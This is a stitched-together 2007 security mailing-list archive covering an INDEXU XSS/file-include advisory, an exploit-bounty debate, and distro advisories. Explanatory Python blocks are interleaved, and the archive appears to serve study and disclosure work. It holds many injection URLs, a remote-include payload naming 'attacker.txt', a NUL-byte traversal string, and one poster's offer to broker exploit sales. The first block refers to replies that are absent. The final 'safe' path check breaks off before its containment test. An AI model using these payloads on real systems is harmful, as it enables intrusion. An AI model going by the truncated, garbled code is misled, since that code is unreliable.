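The two replies above disagree about the same line of code, and both are right about different things: with the "language/" prefix the include can never start with a URL scheme, so there is no remote include (Blake's point), but a traversal sequence plus a %00 still lets an attacker steer the include to a local file of their choosing on PHP versions that truncated paths at NUL, unless magic_quotes_gpc has escaped the NUL first (John's point). The block below is an added example, not code from Jax Petition Book, Gallery or PHP, that models what `require("language/" . $languagepack . ".inc.php")` ends up opening under those settings. It assumes the value has already been URL-decoded (as PHP does before register_globals populates the variable), that magic_quotes_gpc behaves like addslashes(), and that NUL truncation applies to PHP releases before 5.3.4, which later versions replaced with an outright rejection. The same model covers the Gallery thread: a variable assigned a literal before the include, as in Gallery's line 42, never sees the request value at all.

```python
import posixpath


def php_include_target(prefix, user_value, suffix, *, magic_quotes_gpc=False,
                       nul_truncation=True):
    """Path that `require(prefix . $var . suffix)` tries to open, given the
    already URL-decoded request value that register_globals put into $var.

    magic_quotes_gpc: addslashes() on request input turns a raw NUL into the
    two characters backslash and zero, so it no longer terminates the string.
    nul_truncation: PHP before 5.3.4 stopped at the first NUL (C string
    semantics); later versions refuse the path instead.
    """
    if magic_quotes_gpc:
        user_value = (user_value.replace("\\", "\\\\").replace("'", "\\'")
                      .replace('"', '\\"').replace("\x00", "\\0"))
    path = prefix + user_value + suffix
    if "\x00" in path:
        if not nul_truncation:
            raise ValueError("include(): path contains a NUL byte")
        path = path.split("\x00", 1)[0]
    return path


def include_outcome(prefix, user_value, suffix, **opts):
    """Opened path, or the error string for PHP versions that reject NUL."""
    try:
        return php_include_target(prefix, user_value, suffix, **opts)
    except ValueError as e:
        return "ERROR: " + str(e)


def is_remote(path):
    """Only a path that begins with a URL scheme can become a remote include."""
    return path.startswith(("http://", "https://", "ftp://"))


def resolves_outside(base_dir, path):
    """Does the relative include path escape base_dir once '..' is applied?"""
    base = base_dir.rstrip("/") + "/"
    return not posixpath.normpath(posixpath.join(base, path)).startswith(base)


# Constructed inputs: the payloads from the thread, URL-decoded.
RFI_ATTEMPT = "http://attacker.txt?"
LFI_ATTEMPT = "../../some_other_allowed_file_uploads/myfile.php.gif\x00"
WEBROOT = "/var/www/petitionbook"   # assumed install directory
```

Running the three cases: the RFI payload becomes "language/http://attacker.txt?.inc.php", a nonexistent local file; the traversal payload becomes "language/../../some_other_allowed_file_uploads/myfile.php.gif" on old PHP without magic quotes, which resolves outside the web root and into an uploads directory; with magic quotes on, the NUL survives as "\0" and the ".inc.php" suffix is appended again, so the include fails; and on PHP 5.3.4 or later the NUL is rejected outright. None of it reaches the include at all unless register_globals is on.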
   



 





Re: Remedy Action Request System 5.01.02 - User Enumeration

2007-01-16 Thread Davide Del Vecchio
Lee Rumble writes: 

This has always been the case with the Remedy system which I use day in
and day out. This is also present in older versions too and I have spoken with
them about this, but they do not deem this to be a security flaw. 


Hello Lee, 


Whether or not they think it is a security flaw, well, it's their opinion.
I think that the possibility to enumerate users is a security flaw; what about you? 


Gaining access to the system itself has no real advantages either.


It depends on what the system is used for. There are a lot of companies
that attach important documents to Remedy tickets or use Remedy
to trace every activity. In your opinion, is it important to access the
repository in which every activity has been traced? 

Best regards, 

d. 


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Davide Del Vecchio Dante Alighieri [EMAIL PROTECTED]
http://www.alighieri.org http://legaest.blogspot.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 



Re: [Full-disclosure] iDefense Q-1 2007 Challenge

2007-01-16 Thread Simon Smith
I know someone who will pay significantly more per vulnerability against the
same targets. 


On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Also available at:

http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge

*Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in
Vista & IE 7.0*

Both Microsoft Internet Explorer and Microsoft Windows dominate their
respective markets, and it is not surprising that the decision to
update to the current release of Internet Explorer 7.0 and/or Windows
Vista is fraught with uncertainty.  Primary in the minds of IT
security professionals is the question of vulnerabilities that may be
present in these two groundbreaking products.

To help assuage this uncertainty, iDefense Labs is pleased to announce
the Q1, 2007 quarterly challenge.

Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0

Vulnerability Challenge:
iDefense will pay $8,000 for each submitted vulnerability that allows
an attacker to remotely exploit and execute arbitrary code on either
of these two products.  Only the first submission for a given
vulnerability will qualify for the award, and iDefense will award no
more than six payments of $8000.  If more than six submissions
qualify, the earliest six submissions (based on submission date and
time) will receive the award.  The iDefense Team at VeriSign will be
responsible for making the final determination of whether or not a
submission qualifies for the award.  The criteria for this phase of
the challenge are:

I) Technologies Covered:
- -Microsoft Internet Explorer 7.0
- -Microsoft Windows Vista

II) Vulnerability Challenge Ground Rules:
- -The vulnerability must be remotely exploitable and must allow
arbitrary code execution in a default installation of one of the
technologies listed above
- -The vulnerability must exist in the latest version of the
affected technology with all available patches/upgrades applied
- -'RC' (Release candidate), 'Beta', 'Technology Preview' and
similar versions of the listed technologies are not included in this
challenge
- -The vulnerability must be original and not previously disclosed
either publicly or to the vendor by another party
- -The vulnerability cannot be caused by or require any additional
third party software installed on the target system
- -The vulnerability must not require additional social engineering
beyond browsing a malicious site

Working Exploit Challenge:
In addition to the $8000 award for the submitted vulnerability,
iDefense will pay from $2000 to $4000 for working exploit code that
exploits the submitted vulnerability.  The arbitrary code execution
must be of an uploaded non-malicious payload.  Submission of a
malicious payload is grounds for disqualification from this phase of
the challenge.

I) Technologies Covered:
- -Microsoft Internet Explorer 7.0
- -Microsoft Windows Vista

II) Working Exploit Challenge Ground Rules:
Working exploit code must be for the submitted vulnerability only -
iDefense will not consider exploit code for existing vulnerabilities
or new vulnerabilities submitted by others.  iDefense will consider
one and only one working exploit for each original vulnerability
submitted.

The minimum award for a working exploit is $2000.  In addition to the
base award, additional amounts up to $4000 may be awarded based upon:
- -Reliability of the exploit
- -Quality of the exploit code
- -Readability of the exploit code
- -Documentation of the exploit code


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFFpSHsYcX4JiqFDSgRAl+ZAJwMJaZoJ6zwd4m8qZfviOZnNNUVrACgpaTU
QkO9IXq+PsC6bMKg7j6Dwfw=
=N0am
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




Re: [Full-disclosure] iDefense Q-1 2007 Challenge

2007-01-16 Thread K F (lists)
No offense to iDefense as I have used their services in the past... but 
MY Q1 2007 Challenge to YOU is to start offering your researchers more 
money in general! I've sold remotely exploitable bugs in random 3rd 
party products for more $$ than you are offering for these Vista items 
(see the h0n0 #3). I really think you guys are devaluing the exploit 
market with your low offers... I've had folks mail me like WOW iDefense 
offered me $800 for this remote exploit. Pfffttt not quite.


We all know black hats are selling these sploits for >=$25k so why 
should the legit folks settle for anything less? As an example the guys 
at MOAB kicked around selling a Quicktime bug to iDefense but in the end 
we decided it was not worth it due to low pay...


Low Pay == Not getting disclosed via iDefense

-KF



I know someone who will pay significantly more per vulnerability against the
same targets. 



On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote:

  

-BEGIN PGP SIGNED MESSAGE-


Hash: SHA1
 
Also available at:



  

http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+chall
enge



*Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities
  

in


Vista  IE 7.0*

Both Microsoft Internet Explorer and Microsoft Windows
  

dominate their


respective markets, and it is not surprising that the decision
  

to


update to the current release of Internet Explorer 7.0 and/or Windows
Vista
  

is fraught with uncertainty.  Primary in the minds of IT


security
  

professionals is the question of vulnerabilities that may be


present in these
  

two groundbreaking products.



To help assuage this uncertainty, iDefense Labs
  

is pleased to announce


the Q1, 2007 quarterly challenge.

Remote Arbitrary
  

Code Execution Vulnerabilities in Vista and IE 7.0



Vulnerability
  

Challenge:


iDefense will pay $8,000 for each submitted vulnerability that
  

allows


an attacker to remotely exploit and execute arbitrary code on either
of
  

these two products.  Only the first submission for a given


vulnerability will
  

qualify for the award, and iDefense will award no more than six payments
of $8000.  If more than six submissions qualify, the earliest six
submissions (based on submission date and time) will receive the award.
The iDefense Team at VeriSign will be responsible for making the final
determination of whether or not a submission qualifies for the award.
The criteria for this phase of the challenge are:

I) Technologies Covered:
- Microsoft Internet Explorer 7.0
- Microsoft Windows Vista

II) Vulnerability Challenge Ground Rules:
- The vulnerability must be remotely exploitable and must allow
  arbitrary code execution in a default installation of one of the
  technologies listed above
- The vulnerability must exist in the latest version of the affected
  technology with all available patches/upgrades applied
- 'RC' (Release candidate), 'Beta', 'Technology Preview' and similar
  versions of the listed technologies are not included in this
  challenge
- The vulnerability must be original and not previously disclosed
  either publicly or to the vendor by another party
- The vulnerability cannot be caused by or require any additional
  third party software installed on the target system
- The vulnerability must not require additional social engineering
  beyond browsing a malicious site

Working Exploit Challenge:
In addition to the $8000 award for the submitted vulnerability,
iDefense will pay from $2000 to $4000 for working exploit code that
exploits the submitted vulnerability.  The arbitrary code execution
must be of an uploaded non-malicious payload.  Submission of a
malicious payload is grounds for disqualification from this phase of
the challenge.

I) Technologies Covered:
- Microsoft Internet Explorer 7.0
- Microsoft Windows Vista

II) Working Exploit Challenge Ground Rules:
Working exploit code must be for the submitted vulnerability only;
iDefense will not consider exploit code for existing vulnerabilities
or new vulnerabilities submitted by others.  iDefense will consider
one and only one working exploit for each original vulnerability
submitted.

The minimum award for a working exploit is $2000.  In addition to the
base award, additional amounts up to $4000 may be awarded based upon:
- Reliability of the exploit
- Quality of the exploit code
- Readability of the exploit code
- Documentation of the exploit code


vulnerability script indexu all versions

2007-01-16 Thread gamr-14
vulnerability script indexu all versions
Found by :SwEET-DeViL  viP HaCkEr  HaCkEr sUn
TeaM AL-GaRNi
Application : indexu
version : all versions
URL : http://www.nicecoder.com/
google : Powered by INDEXU 5.

Exploits :
|//1\\|
in upgrade.php
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgradetruegateway=[XSS] 
or ../index.php (Local File Include)
##
|//2\\|
in suggest_category.php
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
##
|//3\\|
in user_detail.php
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]
##
|//4\\|
in tell_friend.php
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]
##
|//5\\|
in sendmail.php
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]
##
|//6\\|
in send_pwd.php
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]
##
|//7\\|
in search.php
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]
##
|//8\\|
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]
##
|//9\\|
power_search.php
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.site.com/INDEXU_PATH/power_search.php?contact_name=[XSS]
http://www.site.com/INDEXU_PATH/power_search.php?email=[XSS]
##
|//10\\|
in new.php
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]
http://www.site.com/INDEXU_PATH/new.php?total=[XSS]
##
|//11\\|
in modify.php
http://www.site.com/INDEXU_PATH/modify.php?pflag=searchquery=[XSS]
##
|//12\\|
in mailing_list.php
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]
##
|//13\\|
in login.php
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]
##
|//...\\|
There is another vulnerability in the program, an XSS.
##
[EMAIL PROTECTED]
[EMAIL PROTECTED]
(c)2007###
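
Every entry in the advisory above is the same reflected-XSS pattern: a request parameter echoed into the page without output encoding. The following is an added example, not code from the advisory or from INDEXU. It turns the advisory's script/parameter list into a probe that sends a unique canary to each pair and classifies the response as reflected raw (exploitable in an HTML context), reflected entity-escaped (output encoding in place), or not reflected. The HTTP layer is a callable so the logic runs offline; `fake_indexu()` is a constructed stand-in server (one raw-echoing page, one escaping page) and says nothing about the real product's behaviour.

```python
"""Reflected-XSS probe for the INDEXU parameter list above.

Added example; it is not code from the advisory or from INDEXU.  The
script/parameter pairs are copied from the advisory, the HTTP layer is a
callable so the logic runs offline, and fake_indexu() below is a constructed
stand-in for a server, not the real product's behaviour.
"""
import html
import secrets
from typing import Callable
from urllib.parse import parse_qs, urlencode, urlparse

# (script, parameter) pairs taken from the advisory above.
INDEXU_PARAMS = [
    ("suggest_category.php", "error_msg"),
    ("user_detail.php", "u"),
    ("tell_friend.php", "friend_name"),
    ("sendmail.php", "email"),
    ("send_pwd.php", "username"),
    ("search.php", "keyword"),
    ("register.php", "password"),
    ("power_search.php", "url"),
    ("new.php", "path"),
    ("mailing_list.php", "email"),
    ("login.php", "error_msg"),
]

Fetcher = Callable[[str], str]  # url -> response body


def make_canary() -> str:
    """Unique marker carrying the characters an HTML-context XSS needs to
    survive unescaped: a quote to break out of an attribute, '<' and '>'
    to open a tag.  The random suffix avoids matching static page text."""
    return f'"><xss{secrets.token_hex(4)}>'


def classify_reflection(body: str, canary: str) -> str:
    """'raw' if the canary comes back byte-for-byte (exploitable in an HTML
    context), 'escaped' if only an entity-encoded copy appears (output
    encoding is in place), 'none' if the parameter is not reflected."""
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body:
        return "escaped"
    return "none"


def probe(fetch: Fetcher, base: str, script: str, param: str) -> str:
    """Send one canary to one script/parameter and classify the response."""
    canary = make_canary()
    url = f"{base.rstrip('/')}/{script}?{urlencode({param: canary})}"
    return classify_reflection(fetch(url), canary)


def probe_all(fetch: Fetcher, base: str, params=INDEXU_PARAMS) -> dict:
    """Map 'script?param' -> classification for every pair in the list."""
    return {f"{s}?{p}": probe(fetch, base, s, p) for s, p in params}


def fake_indexu(url: str) -> str:
    """Constructed stand-in for a server (not real INDEXU behaviour):
    login.php echoes error_msg unescaped, search.php escapes keyword,
    every other script ignores its parameter."""
    parts = urlparse(url)
    script = parts.path.rsplit("/", 1)[-1]
    value = next(iter(parse_qs(parts.query).values()), [""])[0]
    if script == "login.php":
        return f'<div class="error">{value}</div>'
    if script == "search.php":
        return f'<input name="keyword" value="{html.escape(value, quote=True)}">'
    return "<html><body>nothing reflected</body></html>"


if __name__ == "__main__":
    for key, verdict in probe_all(fake_indexu, "http://www.site.com/INDEXU_PATH").items():
        print(f"{key:32s} {verdict}")
```

Against a live host, replace `fake_indexu` with a function built on `urllib.request` that returns the body as text. The 'escaped' verdict only covers HTML entity encoding; a value reflected inside a `<script>` block or an event-handler attribute needs a canary and check written for that context.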


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-16 Thread Simon Smith
Amen!
KF is 100% on the money. I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense, In some cases
over $75,000.00 per purchase. The company that I am working with has a
relationship with a legitimate buyer, all transactions are legal. If you're
interested contact me and we'll get the ball rolling.

-Simon
   

$8000.00 USD is low!

On 1/16/07 12:29 PM, K F (lists) [EMAIL PROTECTED] wrote:

 No offense to iDefense as I have used their services in the past... but
 MY Q1 2007 Challenge to YOU is to start offering your researchers more
 money in general! I've sold remotely exploitable bugs in random 3rd
 party products for more $$ than you are offering for these Vista items
 (see the h0n0 #3). I really think you guys are devaluing the exploit
 market with your low offers... I've had folks mail me like WOW iDefense
 offered me $800 for this remote exploit. Pfffttt not quite.
 
 We all know black hats are selling these sploits for =$25k so why
 should the legit folks settle for anything less? As an example the guys
 at MOAB kicked around selling a Quicktime bug to iDefense but in the end
 we decided it was not worth it due to low pay...
 
 Low Pay == Not getting disclosed via iDefense
 
 -KF
 
 
 I know someone who will pay significantly more per vulnerability against the
 same targets. 
 
 
 On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote:
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Also available at:
 http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge
 
 *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in
 Vista & IE 7.0*
 
 Both Microsoft Internet Explorer and Microsoft Windows dominate their
 respective markets, and it is not surprising that the decision to
 update to the current release of Internet Explorer 7.0 and/or Windows
 Vista is fraught with uncertainty.  Primary in the minds of IT
 security professionals is the question of vulnerabilities that may be
 present in these two groundbreaking products.
 
 To help assuage this uncertainty, iDefense Labs is pleased to announce
 the Q1, 2007 quarterly challenge.
 
 Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0
 
 Vulnerability Challenge:
 iDefense will pay $8,000 for each submitted vulnerability that allows
 an attacker to remotely exploit and execute arbitrary code on either
 of these two products.  Only the first submission for a given
 vulnerability will qualify for the award, and iDefense will award no
 more than six payments of $8000.  If more than six submissions
 qualify, the earliest six submissions (based on submission date and
 time) will receive the award.  The iDefense Team at VeriSign will be
 responsible for making the final determination of whether or not a
 submission qualifies for the award.  The criteria for this phase of
 the challenge are:
 
 I) Technologies Covered:
 - Microsoft Internet Explorer 7.0
 - Microsoft Windows Vista
 
 II) Vulnerability Challenge Ground Rules:
 - The vulnerability must be remotely exploitable and must allow
   arbitrary code execution in a default installation of one of the
   technologies listed above
 - The vulnerability must exist in the latest version of the affected
   technology with all available patches/upgrades applied
 - 'RC' (Release candidate), 'Beta', 'Technology Preview' and similar
   versions of the listed technologies are not included in this
   challenge
 - The vulnerability must be original and not previously disclosed
   either publicly or to the vendor by another party
 - The vulnerability cannot be caused by or require any additional
   third party software installed on the target system
 - The vulnerability must not require additional social engineering
   beyond browsing a malicious site
 
 Working Exploit Challenge:
 In addition to the $8000 award for the submitted vulnerability,
 iDefense will pay from $2000 to $4000 for working exploit code that
 exploits the submitted vulnerability.  The arbitrary code execution
 must be of an uploaded non-malicious payload.  Submission of a
 malicious payload is grounds for disqualification from this phase of
 the challenge.
 
 I) Technologies Covered:
 - Microsoft Internet Explorer 7.0
 - Microsoft Windows Vista
 
 II) Working Exploit Challenge Ground Rules:
 Working exploit code must be for the submitted vulnerability only;
 iDefense will not consider exploit code for existing vulnerabilities
 or new vulnerabilities 

Re: [Full-disclosure] iDefense Q-1 2007 Challenge

2007-01-16 Thread Blue Boar
K F (lists) wrote:
 We all know black hats are selling these sploits for =$25k so why 
 should the legit folks settle for anything less? As an example the guys 
 at MOAB kicked around selling a Quicktime bug to iDefense but in the end 
 we decided it was not worth it due to low pay...
 
 Low Pay == Not getting disclosed via iDefense

Maybe that's all they are worth to iDefense, since they aren't
monetizing them in the same way blackhats are.

Maybe for some people if they were going to just give them to Microsoft
anyway, a few thousand bucks is worth it.

Me, for example, if I were capable of finding such vulns, I wouldn't
sell them to the guys writing the drive-by spyware installers. I might
sell it to iDefense or Tippingpoint, though.

BB


rPSA-2007-0008-1 gd

2007-01-16 Thread rPath Update Announcements
rPath Security Advisory: 2007-0008-1
Published: 2007-01-15
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect Deterministic Denial of Service
Updated Versions:
gd=/[EMAIL PROTECTED]:devel//1/2.0.33-4.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0990
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2906
https://issues.rpath.com/browse/RPL-939

Description:
Previous versions of the libgd package are vulnerable to two denial
of service attacks, one of which has been speculated to possibly
enable a code injection attack.  The libgd library is not exposed
via any privileged or remote interfaces within rPath Linux per se,
but it is exposed by some web applications and so may enable a
remote denial of service attack (application crash or unbounded
CPU consumption) against those web applications.


Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability

2007-01-16 Thread Eliah Kagan

On 1/14/07, 3APA3A wrote:

Pretending  this  vulnerability  IS exploitable, what is security impact
from  it? What can you achieve by exploiting this vulnerability you cant
archive without it?


This is a very relevant question, as it appears from the description
that the vulnerability *is* exploitable--for instance if WS_FTP 2007
handles ftp:// URLs (in whatever browser the user is using) and the
user clicks a link with a specially crafted, really long ftp:// URL
(or if the user is told to paste in an ftp:// link and follows the
instructions). That it is not remotely exploitable in some ways does
not necessarily prevent it from being exploitable by an automatic,
off-site mechanism (e.g. a link on a website) in other, more basic
ways requiring simple user interaction. So it could be remotely
exploitable after all.

On the other hand, most people don't tell their browsers to open up a
separate application to handle ftp:// links.

-Eliah


[ MDKSA-2007:014 ] - Updated bluez-utils packages fix hidd vulnerability

2007-01-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:014
 http://www.mandriva.com/security/
 ___
 
 Package : bluez-utils
 Date: January 15, 2007
 Affected: 2006.0
 ___
 
 Problem Description:
 
 hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to
 obtain control of the (1) Mouse and (2) Keyboard Human Interface Device
 (HID) via a certain configuration of two HID (PSM) endpoints, operating
 as a server, aka HidAttack.

 hidd is not enabled by default on Mandriva 2006.0. This update adds the
 --nocheck option (disabled by default) to the hidd binary, which
 defaults to rejecting connections from unknown devices unless --nocheck
 is enabled.

 The updated packages have been patched to correct this problem
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-6899
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 3e4cef35413fb07be1bf17be76e82ab0  
2006.0/i586/bluez-utils-2.19-7.1.20060mdk.i586.rpm
 71fe8899bacb7cf75482f3deced101c4  
2006.0/i586/bluez-utils-cups-2.19-7.1.20060mdk.i586.rpm 
 4d4e9c474520e55710458666c1624c24  
2006.0/SRPMS/bluez-utils-2.19-7.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 cf217ff41df2f2abd65b86c12c15177a  
2006.0/x86_64/bluez-utils-2.19-7.1.20060mdk.x86_64.rpm
 26b6a142c00e22cb4fcb737f724b0bc1  
2006.0/x86_64/bluez-utils-cups-2.19-7.1.20060mdk.x86_64.rpm 
 4d4e9c474520e55710458666c1624c24  
2006.0/SRPMS/bluez-utils-2.19-7.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFq+jImqjQ0CJFipgRAhZWAKDI1a6x+kq1WIsXK9OWSMBCeajsvACeMbFH
/4ZtTMPLJviIdhZkqlWIRzE=
=pphf
-END PGP SIGNATURE-



Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability

2007-01-16 Thread HACKPL - bugtraq/sapheal

So it could be remotely
exploitable after all.

On the other hand, most people don't tell their browsers to open up a
separate application to handle ftp:// links.



I agree. It could be exploited in the aforementioned way(but: WS_FTP is not 
registered to handle FTP protocol by default). Now I am thinking of 
something else. Could we use a specially crafted FHF file to exploit the 
vulnerability? I haven't checked that yet.


Michal Bucko (sapheal) 



[ GLSA 200701-11 ] Kronolith: Local file inclusion

2007-01-16 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: Kronolith: Local file inclusion
  Date: January 16, 2007
  Bugs: #156627
ID: 200701-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Kronolith contains a flaw that could allow the execution of arbitrary
files.

Background
==

Kronolith is a web-based calendar which relies on the Horde Framework
for integration with other applications.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  www-apps/horde-kronolith2.1.4   = 2.1.4

Description
===

Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered
string is used instead of a sanitized string to view local files.

Impact
==

An authenticated attacker could craft an HTTP GET request that uses
directory traversal techniques to execute any file on the web server as
PHP code, which could allow information disclosure or arbitrary code
execution with the rights of the user running the PHP application
(usually the webserver user).

Workaround
==

There is no known workaround at this time.

Resolution
==

All horde-kronolith users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =www-apps/horde-kronolith-2.1.4

References
==

  [ 1 ] CVE-2006-6175
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6175

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpJ4Q2relTmg.pgp
Description: PGP signature


Re: Trevorchan = v0.7 Remote File Include Vulnerability

2007-01-16 Thread Stefano Zanero
[EMAIL PROTECTED] wrote:

 Script:Trevorchan v0.7

Fake vuln

 require_once($tc_config['rootdir'] . '/inc/functions.php');
 require_once($tc_config['rootdir'] . '/inc/encryption.php');

These vars are initialized in config.php, which is require-d by the
files you mention.

 Exploit: 

Obviously, you didn't care to test them.

PLEASE STOP REPORTING FAKE PHP VULNS.

Stefano


SYMSA-2007-001: Oracle Application Server 10g - Directory Traversal

2007-01-16 Thread research
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



   Symantec Vulnerability Research
   http://www.symantec.com/research
Security Advisory


   Advisory ID: SYMSA-2007-001
Advisory Title: Oracle Application Server 10g - Directory Traversal
  Release Date: 16-01-2007
   Application: Oracle Application Server 10g Release 3 (10.1.3.0.0)
  Platform: Windows and possibly others
  Severity: Remotely exploitable / User access
Author: Oliver Karow / [EMAIL PROTECTED]
 Vendor status: Verified by Vendor, Update Available
CVE Number: CVE-2007-0222
 Reference: http://www.securityfocus.com/bid/22027


Overview:

From Oracle's web site: Oracle Application Server 10g offers a
comprehensive solution for developing, integrating, and
deploying your enterprise's applications, portals, and Web
services. Based on a powerful and scalable J2EE server, Oracle
Application Server 10g provides complete business integration
and business intelligence suites, and best-of-breed portal
software. Oracle Application Server 10g is the only platform
designed for grid computing as well as full lifecycle support
for Service-Oriented Architecture (SOA).

A vulnerable server side component allows remote access to
files outside of the application's root directory with
permissions of the LocalSystem process. No authentication is
required.


Details:

The server side component EmChartBean is part of the Oracle
Enterprise Manager 10g Application Server Control Software.
EmChartBean is vulnerable to a directory traversal attack.

The vulnerability can be exploited by sending an unauthenticated
http GET request. Remote access is granted to files outside of
the application's root directory with permissions of the
Javaw.exe process, which by default runs with LocalSystem
privileges.

The server side component EmChartBean only exists at runtime,
and is unpacked from a JAR file after an initial call to the
login page. Thus, a single request to the login page is
required before an attacker can successfully exploit the
vulnerability.
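
The Kronolith advisory (lib/FBView.php passing a raw request string to an include, so any file on the server runs as PHP) and the EmChartBean issue above are the same defect: a request parameter is joined to a base directory and used without canonicalisation, so "../" segments walk out of the intended directory. The following is an added example, not code from Kronolith, Horde or Oracle Application Server, showing the check both are missing: resolve the joined path first, then verify the result still sits under the base directory, then apply an allow-list on the file type. The directory tree, file names and allowed suffixes are constructed for the demonstration.

```python
"""Canonicalise-then-contain: the check both advisories above lack.

Added example, not code from Kronolith, Horde or Oracle Application
Server.  The directory tree, file names and allowed suffixes below are
constructed for the demonstration.
"""
import os
import tempfile
from pathlib import Path

ALLOWED_SUFFIXES = {".php", ".txt"}  # assumption: what a view name may name


def naive_resolve(base: str, name: str) -> str:
    """The vulnerable pattern: concatenate and trust the result."""
    return base + "/" + name


def safe_resolve(base: str, name: str) -> Path:
    """Resolve `name` under `base` and refuse anything that escapes it.

    Order matters: canonicalise first (so '..' segments, absolute paths and
    symlinks are all collapsed), then compare against the canonical base.
    """
    if "\x00" in name:                      # NUL truncates C paths
        raise ValueError("NUL byte in file name")
    base_real = Path(base).resolve(strict=True)
    try:
        # strict=True: the target must exist, so the check sees the real
        # file rather than a guess about where a dangling path would point.
        target = (base_real / name).resolve(strict=True)
    except FileNotFoundError:
        raise ValueError(f"no such file under {base_real}: {name!r}") from None
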